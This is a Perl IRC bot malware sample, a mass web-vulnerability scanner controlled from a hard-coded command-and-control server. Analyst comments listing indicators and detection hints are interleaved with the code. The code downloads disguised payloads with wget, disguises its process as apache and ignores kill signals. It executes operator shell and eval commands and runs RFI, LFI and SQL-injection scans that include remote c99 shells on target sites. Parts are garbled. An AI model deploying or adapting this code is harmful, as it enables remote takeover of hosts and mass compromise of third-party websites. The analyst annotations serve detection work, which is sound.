#!/usr/bin/perl
###################################################################################
# Bot Scanner UPGRARE by tembAgA ##
# -------------------------------------------------------------------------------##
# MALAYSIAN CODER ##
###################################################################################
####### DON'T MODIF IT or SCRIPT NOT WORK #######
$powered="tembAgA"; #
$mail="amiroth@yahoo.com"; #
#################################################
#################################################
use HTTP::Request; #
use HTTP::Request::Common; #
use HTTP::Request::Common qw(POST); #
use LWP::Simple; #
use LWP 5.53; #
use LWP::UserAgent; #
use Socket; #
use IO::Socket; #
use IO::Socket::INET; #
use IO::Select; #
use MIME::Base64; #
use File::Basename; #
use Getopt::Long; #
use URI; #
#################################################
# Character pool for the random nickname suffix built below. The pool holds
# one two-character entry ('NS'), so a suffix can be longer than six characters.
my @array = (
    'a', 'b',  'c', 'd', 'e', 'f', 'g', 'h', 'i', 'l', 'm', 'n',
    'o', 'p',  'q', 'r', 's', 't', 'u', 'i', 'O', 'Y', 'T', 'Y',
    'O', 'O',  'P', 'p', 'B', 'C', 'R', 'O', 'S', 'E', 'K', 'J',
    'W', 'NS', 'j', 'k', 'v', 'w', 'x', 'z', '1', '2', '3', '4',
    '5', '6',  '7', '8', '9', '0'
);
# Captured once at startup; the TIME reply in the message loop sends this same
# value rather than the current time.
my $datetime = localtime;
# String later written to $0 so that process listings show a web-server-like
# command line instead of the perl script.
my $fakeproc = "/usr/sbin/apache3 -k start";
# Hard-coded command-and-control endpoint (IRC server address and TCP port).
# The server can be replaced by the first command-line argument further down.
# Analyst note: the address, port, channel and the "orked-" nickname prefix in
# this block are network indicators taken directly from this sample.
my $ircserver = "104.171.118.134";
my $ircport = "6660";
# Nickname = fixed prefix plus six random picks from @array.
my $nickname = "orked-"
  . $array[ rand(@array) ]
  . $array[ rand(@array) ]
  . $array[ rand(@array) ]
  . $array[ rand(@array) ]
  . $array[ rand(@array) ]
  . $array[ rand(@array) ];
# Ident string sent in the IRC USER command by connector().
# NOTE(review): presumably chosen to resemble a web IRC client - confirm.
my $ident = "Mibbit";
# Channel joined after the server welcome, and the nick that receives the
# check-in PRIVMSG; the same nick is what the isAdmin() calls are applied to
# (isAdmin itself is not visible in this part of the file).
my $channel = "#komuniti";
my $admin = "pico";
# Not referenced in the visible part of the file.
my $fullname = "http://www.mibbit.com";

#########################################################

my $zerologo = "15,1 0[zero]15";;
my $thumblogo = "15,1 0[tim]15";;
my $lfilogo = "15,1 0[lfi]15";;
my $rfilogo = "15,1 0[rfi]15";;
my $e107logo = "15,1 0[e107]15";;
my $xmllogo = "15,1 0[xml]15";;
my $sqllogo = "15,1 0[sql]15";;
my $oscologo = "15,1 0[osco]15";;
my $zenlogo = "15,1 0[zen]15";;
my $oplogo = "15,1 0[op]15";;
my $admlogo = "15,1 0[adm]15";;
my $smslogo = "15,1 0[sms]15";;
my $ossqllogo = "15,1 0[ossql]15";;
my $e107logosql = "15,1 0[e107sql]15";;
my $whmlogo = "15,1 0[whm]15";;

my $thumbcmd = '!tum';
my $zerocmd = '!zero';
my $lficmd = '!lfi';
my $rficmd = '!rfi';
my $e107cmd = '!e107';
my $xmlcmd = '!xml';
my $sqlcmd = '!mysql';
my $oscocmd = '!osco';
my $zencmd = '!zen';
my $admcmd = '!adm';
my $opcmd = '!op';
my $ossqlcmd = '!oscoo';
my $esqlcmd = '!sqle';
my $whmcmd = '!whm';

my $cmdlfi = '!cmdlfi';
my $cmde107 = '!cmde107';
my $cmdxml = '!cmdxml';

##########################################################
# Remote resources the scan routines reference. $injector/$action/$thumbshell
# and $botshell/$botshell2 are URLs of externally hosted files that the
# exploit routines further down ask a target to fetch or include.
# Analyst note: every URL in this block is an indicator from this sample; the
# hosting sites may themselves be compromised third parties.
my $injector = "http://www.st-williams.com.tw/appserv/AUTHORS.txt";
my $action = "http://www.st-williams.com.tw/appserv/AUTHORS.txt";
my $botshell = "http://www.Sh3LL.org/c99.txt?";
my $botshell2 = "http://www.Sh3LL.org/c99.txt?";
my $thumbshell = "http://www.st-williams.com.tw/appserv/AUTHORS.txt";
#############################################################################################################
# List of third-party "google.php" relay scripts; one is picked at random at
# startup. NOTE(review): the code that uses $bypass is not visible here -
# presumably it proxies search-engine queries; confirm against the full file.
my @bypasser = ("http://www.gestion-tripartita.es/google.php","http://www.atpa.cl/wordpress/google.php","http://pvcproject.reecezone.net/google.php");
my $bypass = $bypasser[rand(scalar(@bypasser))];
# Fixed browser User-Agent string; e107_rce_query() sends it on its requests.
my $uagent = 'Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0';
my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00";
my $open_test = "/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
my $adm_output = ("uid=");
my $open_output = ("FCKeditor - Connectors Tests");

my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator',
'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address',
'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
# Ignore interrupt, hang-up and terminate signals so the process survives
# Ctrl-C, a closed terminal and a plain `kill`; only an uncatchable signal
# stops it. Ignoring CHLD lets exited children be reaped automatically on
# most Unix systems. 'PS' is not a standard signal name.
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
# Work from /tmp and shell out (backticks) to wget, saving four downloads as
# ewec.jpg, ikal.jpg, lovie.jpg and logi.jpg. The captured output ($priper)
# is not used again in the visible code.
# Analyst note: host indicators are these file names under /tmp and a perl
# process spawning a shell that runs wget.
chdir("/tmp");
chop (my $priper = `wget http://www.daisychainwiltshire.co.uk/images/ewec.jpg -O ewec.jpg;wget http://www.daisychainwiltshire.co.uk/images/ikal.jpg -O ikal.jpg;wget http://kobicom.com/cgi-bin/zeroboard/bbs//data/lovie.jpg -O lovie.jpg;wget http://www.daisychainwiltshire.co.uk/images/logi.jpg -O logi.jpg`);
# An optional first command-line argument replaces the hard-coded IRC server.
$ircserver = "$ARGV[0]" if $ARGV[0];
# Overwrite the process title with $fakeproc ("" x 16 is the empty string, so
# nothing is appended). Process listings then show the fake command line; on
# Linux, /proc/<pid>/exe still resolves to the perl interpreter, which is a
# reliable way to spot the mismatch during triage.
$0 = "$fakeproc"."" x 16;;
# Detach from the launcher: the parent exits immediately and the child keeps
# running; die only when fork itself failed ($pid undefined).
my $pid = fork;
exit if $pid;
die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);

# Global connection state: %irc_servers is keyed by socket and holds
# host/port/nick/myip per connection; $sel_client is the IO::Select set the
# main loop polls. %DCC and $dcc_sel are not used in the visible code.
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
# Write one raw IRC line, terminated with "\n".
#   sendraw($socket, $line) - write to the given socket
#   sendraw($line)          - write to the global $IRC_cur_socket
# The line is sent as-is; nothing here strips CR/LF or otherwise validates
# text that originated from a remote message.
sub sendraw {
# $#_ is the last index of @_, so 1 means exactly two arguments were passed.
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}

# Open a TCP connection to an IRC server and register on it.
#   $_[0] nickname, $_[1] server host, $_[2] server port
# Returns 1 when the socket cannot be created; otherwise falls through after
# registering. The connection is plain TCP (no TLS is requested here), so the
# NICK/USER/JOIN/PRIVMSG traffic is visible in clear text to network sensors.
sub connector {
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket)) {
# Make this the current socket and add it to the select set polled by the
# main loop.
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
# Per-connection bookkeeping, keyed by the socket.
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
# nick() is defined outside the visible part of the file.
nick("$mynick");
my $versi = "IDC";
# The USER line carries the local socket address of the infected host and the
# fixed real-name field "IDC".
sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");
sleep (1);}}
# Handle one server-originated IRC line: keep-alive, nickname tracking and
# the post-registration join. Reads and updates the globals $mynick,
# $IRC_cur_socket and %irc_servers.
sub parse {
my $servarg = shift;
# Keep-alive: echo the server's PING token back.
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
}
# A NICK change for our own nick: record the new name.
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($mynick)) {
$mynick = $4;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
}
}
# Numeric 433 (nickname in use): retry with a digit appended.
# int rand(1) always evaluates to 0.
elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$mynick".int rand(1));
}
# Numeric 001 (welcome): registration succeeded. Set user modes +iB, join
# the configured channel and send a check-in PRIVMSG to the admin nick.
# Analyst note: the MODE/JOIN/PRIVMSG sequence right after 001 is a stable
# behavioural signature in clear-text captures.
elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
sendraw("MODE $mynick +iB");
sendraw("JOIN $channel");
sleep(2);
sendraw("PRIVMSG $admin : hadir gan ");
}
}
# Main event loop (its body continues well beyond these lines).
my $line_temp;
while( 1 ) {
# Reconnect whenever no server is registered. connector() returns at once on
# failure and nothing here sleeps between attempts, so an unreachable server
# produces a rapid stream of outbound connection attempts to the C2 port -
# visible in firewall and netflow logs.
while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }
# 10 ms pause per iteration.
select(undef, undef, undef, 0.01);;
delete($irc_servers{''}) if (defined($irc_servers{''}));
# Non-blocking poll of all registered sockets.
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
# Read up to 4096 bytes; a zero-byte read means the peer closed the
# connection, so the socket is dropped and the outer loop will reconnect.
$nread = sysread($fh, $ircmsg, 4096);
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
# NOTE(review): @lines is filled here, but the handlers visible below match
# against the whole $ircmsg buffer - confirm against the full file.
@lines = split (/\n/, $ircmsg);
$ircmsg =~ s/\r\n$//;

# Dispatch on PRIVMSG. Captures sender nick, ident, host, the target
# ($path: a channel or this bot's nick) and the message text.
if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
# Comma-separated list of search back-ends handed to the scan routines.
my $engine ="Simbah,Yahoo2,AllTheWeb,Bing,ALtaViSTa,AsK,KvaSiR,GooGLe2,QuinT,YahOo,ByPaSs,SeZnaM,oNeT,iNtEria,Pagina";
# --- Messages addressed directly to the bot's nick ---
if ($path eq $mynick) {
# Replies to PING/VERSION/TIME queries. The VERSION reply is a fixed
# string claiming to be a desktop IRC client; that literal is a usable
# network signature for this sample.
if ($msg =~ /^PING (.*)/) {
sendraw("NOTICE $nick :PING $1");
}
if ($msg =~ /^VERSION/) {
sendraw("NOTICE $nick :VERSION mIRC v7.32 Khaled Mardam-Bey");
}
if ($msg =~ /^TIME/) {
sendraw("NOTICE $nick :TIME ".$datetime."");
}
# Operator commands. Every check passes only the sender's nick to
# isAdmin(); $ident and $host are captured above but not passed in.
# NOTE(review): isAdmin() is not visible here - it looks like control of the
# bot rests on the IRC nickname alone; confirm against the full file.
# "!out" kills this process, "!killall" kills every perl process on the
# host, both through the shell() helper (defined outside this view).
if (&isAdmin($nick) && $msg eq "!out") {
&shell("$path","kill -9 $$");
}
if (&isAdmin($nick) && $msg eq "!killall") {
&shell("$path","killall -9 perl");
}
if (&isAdmin($nick) && $msg eq "!reset") {
sendraw("QUIT :Restarting...");
}
if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
sendraw("JOIN #".$1);
}
if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
sendraw("PART #".$1);
}
if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
sendraw("NICK ".$1);
}
# Reports the fake process title and the real PID back to the operator.
if (&isAdmin($nick) && $msg =~ /^!pid/) {
sendraw($IRC_cur_socket, "PRIVMSG $nick :9Fake Process/PID : $fakeproc - $$");
}
# Any private message from the operator that does not start with "!" is
# handed to shell() verbatim: remote command execution on the infected
# host with the privileges of this process.
if (&isAdmin($nick) && $msg !~ /^!/) {
&shell("$nick","$msg");
}
}
else {
# --- Messages sent to a channel ($path is the channel name) ---
# Same operator commands as in the private-message branch, gated by
# isAdmin($nick) (defined outside this view).
if (&isAdmin($nick) && $msg eq "!out") {
&shell("$path","kill -9 $$");
}
if (&isAdmin($nick) && $msg eq "!killall") {
&shell("$path","killall -9 perl");
}
if (&isAdmin($nick) && $msg eq "!reset") {
sendraw("QUIT :Restarting...");
}
if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
sendraw("JOIN #".$1);
}
if (&isAdmin($nick) && $msg eq "!part") {
sendraw("PART $path");
}
if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
sendraw("PART #".$1);
}
# ".sh <text>" and "<botnick> <text>" pass <text> to shell(): operator-
# supplied command execution on the host. The bot's nick is interpolated
# into the second pattern without escaping.
if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
&shell("$path","$1");
}
if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
&shell("$path","$1");
}
# "!eval <text>" runs <text> through Perl's string eval: arbitrary code
# received over IRC executes inside this process.
if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {
eval "$1";
}

##################################################################### HELP COMMAND

if ($msg=~ /^!help/) {
my $helplogo = "15,1(3MULTISCAN15)";
&msg("$path","$helplogo 0 $whmcmd $thumbcmd $zerocmd $lficmd $rficmd $e107cmd $xmlcmd $sqlcmd $oscocmd $zencmd $admcmd $opcmd $ossqlcmd $esqlcmd");
}

if ($msg=~ /^!version/) {
my $versionlogo = "15,1(4@9Version15)";
&msg("$path","$versionlogo 13 Malaysian Coder team ");
}

if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
if (&isFound($injector,"new(GET=>$cracker);

my $useragent = LWP::UserAgent->new();

$useragent->timeout(10);

my $response = $useragent->request($request);

if ($response->is_success) {

my $res = $response->content;

if ($res =~ m/
(.*)/g) {

my $result = $1;

sendraw($IRC_cur_socket, "PRIVMSG $channel :4,1[14MD54]0 Result:5 $hash 0=>9 $result 8!");

}

else {

sendraw($IRC_cur_socket, "PRIVMSG $channel :4,1[14MD54]0 ".$hash." 14not found. 8!");

}

}

else { sendraw($IRC_cur_socket, "PRIVMSG $channel :4,1[14MD54]0 Cannot open DataBase 8!"); }

}

exit;

}

}

if ($msg=~ /^!md5decode (.*)$/ ) {
if (my $pid = fork) {

waitpid($pid, 0);

} else {

if (fork) {

exit;

} else {

my $hash = $1;

sendraw($IRC_cur_socket, "PRIVMSG $channel :4,1[14MD54]0 Try to Convert:5 $hash 8!");

my $cracker = "http://md5.rednoize.com/?q=".$hash;

my $request = HTTP::Request->new(GET=>$cracker);

my $useragent = LWP::UserAgent->new();

$useragent->timeout(10);

my $response = $useragent->request($request);

if ($response->is_success) {

my $res = $response->content;

if ($res =~ m/
(.*)/g) {

my $result = $1;

sendraw($IRC_cur_socket, "PRIVMSG $channel :4,1[14MD54]0 Result:5 $hash 0=>9 $result 8!");

}

else {

sendraw($IRC_cur_socket, "PRIVMSG $channel :4,1[14MD54]0 ".$hash." 14not found. 8!");

}

}

else { sendraw($IRC_cur_socket, "PRIVMSG $channel :4,1[14MD54]0 Cannot open DataBase 8!"); }

}

exit;

}

}

if ($msg=~ /^!ip\s+(.*)/ ) {
if (my $pid = fork) { waitpid($pid, 0); } else {
if (fork) { exit; } else {
my $ip = $1;
&msg("$path","15(9@11IP15)4 Searching ".$ip." 12Location ...");
my $website = "http://www.ipligence.com/geolocation";
my ($useragent,$request,$response,%form);
undef %form;
$form{ip} = $ip;
$useragent = LWP::UserAgent->new;
$useragent->timeout(5);
$request = POST $website,\%form;
$response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/Your IP address is(.*)
City:(.*)
Country:(.*)
Continent:(.*)
Time/g) {
my ($ipaddress,$city,$country,$continent) = ($1,$2,$3,$4);
&msg("$path","15(9@4IP15)7 IP Address : ".$ip."15 (4".$ipaddress."15 )");
&msg("$path","15(9@4IP15)7 City : ".$ip."15 (4".$city."15 )");
&msg("$path","15(9@4IP15)7 Country : ".$ip."15 (4".$country."15 )");
&msg("$path","15(9@4IP15)7 Continent : ".$ip."15 (4".$continent."15 )");
}
else {
&msg("$path","15(9@11IP15)7 ".$ip." 6not found in database");
}
}
else {
&msg("$path","15(9@11IP15)4 Cannot open IP database.");
}
}
exit;
}
}

################################ZERO BOARD#####################################

# Scan trigger: "<zerocmd> <bug> <dork>". No isAdmin() gate is visible on this
# handler as shown. The same fork pattern repeats in the scan handlers below.
if ($msg=~ /^$zerocmd\s+(.+?)\s+(.*)/) {
# Double fork: this process waits only for the short-lived first child; the
# first child forks again and exits, and the grandchild does the work. The
# message loop therefore keeps servicing IRC while scans run as separate
# perl processes - a burst of extra perl processes is a host-side sign.
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
# Announce the search string and target path to the channel, then start
# the scan. scan_start() is defined outside this view; the trailing
# number (14 here) presumably selects the scan type - confirm.
&msg("$path","$zerologo 9Dork :4 $dork");
&msg("$path","$zerologo 13Bugz :4 $bug ");
&msg("$path","$zerologo 8Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,14);
}
exit;
}
}
##################################TIMTHUMB####################################

if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($thumbshell,"GIF89a")) {
my ($bug,$dork) = ($1,$2);
&msg("$path","$thumblogo 9Dork :4 $dork");
&msg("$path","$thumblogo 13Bugz :4 $bug ");
&msg("$path","$thumblogo 8Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,15);
}
else {
&msg("$path","[ $nick ] $thumblogo 4TimThumb Uploader is Down!");
}

}
exit;
}
}

##################################################################### RFI SCAN

if ($msg=~ /^$rficmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"<?php")) {
my ($bug,$dork) = ($1,$2);
&msg("$path","$rfilogo 9Dork :4 $dork");
&msg("$path","$rfilogo 13Bugz :4 $bug");
&msg("$path","$rfilogo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,1);
} else {
&msg("$path","[ $nick ] $rfilogo 4PHP Shell Not Found!");
}
}
exit;
}
}

##################################################################### LFI SCAN

if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"<?php")) {
my ($bug,$dork) = ($1,$2);
&msg("$path","$lfilogo 9Dork :4 $dork");
&msg("$path","$lfilogo 13Bugz :4 $bug");
&msg("$path","$lfilogo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,2);
} else {
&msg("$path","[ $nick ] $lfilogo 4PHP Shell Not Found!");
}
}
exit;
}
}

##################################################################### e107 SCAN

if ($msg=~ /^$e107cmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"<?php")) {
my ($bug,$dork) = ("contact.php",$1);
&msg("$path","$e107logo 9Dork :4 $dork");
&msg("$path","$e107logo 13Bugz :4 $bug");
&msg("$path","$e107logo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,3);
} else {
&msg("$path","[ $nick ] $e107logo 4PHP Shell Not Found!");
}
}
exit;
}
}
##################################################################### XML SCAN
if ($msg=~ /^$xmlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"<?php")) {
my ($bug,$dork) = ($1,$2);
&msg("$path","$xmllogo 9Dork :4 $dork");
&msg("$path","$xmllogo 13Bugz :4 $bug");
&msg("$path","$xmllogo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,4);
} else {
&msg("$path","[ $nick ] $xmllogo 4PHP Shell Not Found!");
}
}
exit;
}
}

##################################################################### SQL SCAN

if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
&msg("$path","$sqllogo 9Dork :4 $dork");
&msg("$path","$sqllogo 13Bugz :4 $bug");
&msg("$path","$sqllogo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,5);
}
exit;
}
}

##################################################################### OSCO SCAN

if ($msg=~ /^$oscocmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"<?php")) {
my ($bug,$dork) = ("admin/categories.php/login.php",$1);
&msg("$path","$oscologo 9Dork :4 $dork");
&msg("$path","$oscologo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,6);
} else {
&msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
}
}
exit;
}
}
##################################################################### OSCO2 SCAN

if ($msg=~ /^$oscocmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"<?php")) {
my ($bug,$dork) = ("admin/file_manager.php/login.php",$1);
&scan_start($path,$bug,$dork,$engine,12);
} else {
&msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
}
}
exit;
}
}

##################################################################### OSCOSQL SCAN

if ($msg=~ /^$ossqlcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
&msg("$path","$ossqllogo 9Dork :4 $dork");
&msg("$path","$ossqllogo 13Bugz :4 $bug");
&msg("$path","$ossqllogo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,10);
}
exit;
}
}

##################################################################### OSCO3 SCAN

if ($msg=~ /^$oscocmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"<?php")) {
my ($bug,$dork) = ("admin/banner_manager.php/login.php",$1);
&msg("$path","$oscologo 9Dork :4 $dork");
&msg("$path","$oscologo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,11);
} else {
&msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
}
}
exit;
}
}
##################################################################### E107SQL SCAN

if ($msg=~ /^$esqlcmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ("contact.php",$1);
&msg("$path","$e107logosql 9Dork :4 $dork")
&msg("$path","$e107logosql 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,13);
}
exit;
}
}
##################################################################### PhpMyAdmin SCAN

if ($msg=~ /^$admcmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ("phpMyAdmin/config/config.inc.php",$1);
&msg("$path","$admlogo 9Dork :4 $dork");
&msg("$path","$admlogo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,7);
}
exit;
}
}
##################################################################### OPENCART SCAN

if ($msg=~ /^$opcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
&msg("$path","$oplogo 9Dork :4 $dork");
&msg("$path","$oplogo 13Bugz :4 $bug");
&msg("$path","$oplogo 3Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,8);
}
exit;
}
}
##################################################################### ZEN SCAN

if ($msg=~ /^$zencmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
&msg("$path","$zenlogo 9Dork :4 $dork");
&msg("$path","$zenlogo 13Search Engine Loading ...");
&scan_start($path,$bug,$dork,$engine,9);
}
exit;
}
}
##################################################################### ZEN SCAN

if ($msg=~ /^$zencmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ("admin/record_company.php",$1);
&scan_start($path,$bug,$dork,$engine,9);
}
exit;
}
}
##################################################################### zero SCAN
if ($msg=~ /^$whmcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
&msg("$path","$whmlogo 3D14ork :4 $dork");
&msg("$path","$whmlogo 3B14ugz :4 $bug");
&msg("$path","$whmlogo 14[-] 3E14xploiting WHMCS start...");
&scan_start($path,$bug,$dork,$engine,16);
}
exit;
}
}
}
}

for(my $c=0; $c 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$rfilogo 4$engine 0 Scan finish"); }
my $coba = "http://".$site.$bug."test??";
my $test = "http://".$site.$bug.$injector."??";
my $dor = "http://".$site.$bug.$botshell."??";
my $dor2 = "http://".$site.$bug.$botshell2."??";
my $cek = &get_content($coba);sleep(1);
&get_content($dor);sleep(1);
&get_content($dor2);sleep(1);
if ($cek =~ /failed to open stream/i) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
&rfi_xpl($test,$chan,$site);
exit;}
}
}
}
}
}

# Check one candidate URL for remote file inclusion and report the outcome.
#   $_[0] base URL, $_[1] channel to report to, $_[2] site (unused below)
# Appends the configured remote URLs ($injector, $botshell, $botshell2) plus
# "??" to the base URL and requests each through get_content() (defined
# outside this view).
# Analyst note: in web-server logs this shows up as request parameters whose
# value is itself an http:// URL ending in "??". Hardening: keep PHP's
# allow_url_include disabled and never build include paths from request data.
sub rfi_xpl() {
my $url = $_[0];
my $chan = $_[1];
my $site = $_[2];
my $dor = $url.$botshell."??";
my $dor2 = $url.$botshell2."??";
my $test = $url.$injector."??";
my $vuln = $url."14(ZithNet)";
my $check = &get_content($test);
&get_content($dor);sleep(1);
&get_content($dor2);sleep(1);
# The marker "ZITH" in the response is treated as proof that the remote file
# was included and executed by the target.
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
# Pull host details out of the response for the report.
# NOTE(review): two of these patterns contain a literal line break, which
# looks like markup lost when the page was extracted - confirm.
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
# Report the URL to the channel and, separately, to the admin nick.
&msg("$chan","$rfilogo 9VuLn 13 ".$vuln."9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)(4@9safemode-off15)");
&msg("$admin","$rfilogo 9VuLn 13 ".$vuln."9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");
}
else {&msg("$chan","$rfilogo 11checking 0".$vuln." 7safemode-on");}
}

